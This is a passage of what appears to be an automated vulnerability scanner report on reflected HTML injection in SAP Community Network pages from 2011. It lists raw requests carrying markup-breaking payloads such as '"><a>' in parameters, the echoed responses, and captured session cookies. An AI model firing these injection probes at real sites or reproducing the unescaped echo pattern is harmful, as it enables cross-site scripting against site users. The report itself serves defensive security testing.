s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28909
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 15:00:43 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact95d29"><a>12c19bdc070">
...[SNIP]...

3.120. http://www.sdn.sap.com/irj/scn/bc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/bc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf04"><a>cae7ae068e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/bc?8cf04"><a>cae7ae068e4=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:17 GMT
Content-Length: 23294
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/bc?8cf04"><a>cae7ae068e4=1">
...[SNIP]...

3.121. http://www.sdn.sap.com/irj/scn/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aa4b"><a>cc0ea3522ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:05:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/downloads?6aa4b"><a>cc0ea3522ee=1">
...[SNIP]...

3.122. http://www.sdn.sap.com/irj/scn/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b43e"><a>55547d3eb18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/index?3b43e"><a>55547d3eb18=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:05:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 57953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/index?3b43e"><a>55547d3eb18=1">
...[SNIP]...

3.123. http://www.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6d"><a>e74a0162951 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/logon?c6a6d"><a>e74a0162951=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Content-Length: 21705
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/logon?c6a6d"><a>e74a0162951=1">
...[SNIP]...

3.124. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/sdnweblogs/popularposts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e88"><a>b718e3f5e9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/sdnweblogs/popularposts?21e88"><a>b718e3f5e9a=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/26917
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; PortalAlias=scn; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318691703148%3B%20pe%3Dno%2520value%7C1318691703151%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318691703155%3B%20s_nr%3D1318689903165-New%7C1321281903165%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293503170%3B%20s_visit%3D1%7C1318691703171%3B%20gpv_p47%3Dno%2520value%7C1318691703175%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ablog%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/sdnweblogs/popularposts%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 30557
Date: Sat, 15 Oct 2011 14:59:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/sdnweblogs/popularposts?21e88"><a>b718e3f5e9a=1">
...[SNIP]...

3.125. http://www.sdn.sap.com/irj/scn/weblogs [blog parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b98"><a>ea3bc329510 was submitted in the blog parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/2774b98"><a>ea3bc329510 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28808
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:53 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/2774b98"><a>ea3bc329510">
...[SNIP]...

3.126. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7cea"><a>41405d9f727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/27&e7cea"><a>41405d9f727=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28819
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:27 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/weblogs/topic/27&e7cea"><a>41405d9f727=1">
...[SNIP]...

3.127. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77470"><a>5b7498adf8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/logon?77470"><a>5b7498adf8d=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:27 GMT
Content-Length: 21730
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/logon?77470"><a>5b7498adf8d=1">
...[SNIP]...

3.128. http://www.sdn.sap.com/irj/sdn/mypoints [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/mypoints

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff7d"><a>9b3a83d8c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1 HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 45094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/mypoints?6ff7d"><a>9b3a83d8c4b=1">
...[SNIP]...

3.129. https://www.sme.sap.com/irj/sme/cpslogon [RelayState parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The value of the RelayState request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1c0"><a>a6b35360b1d was submitted in the RelayState parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut1d1c0"><a>a6b35360b1d HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response (redirected)

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
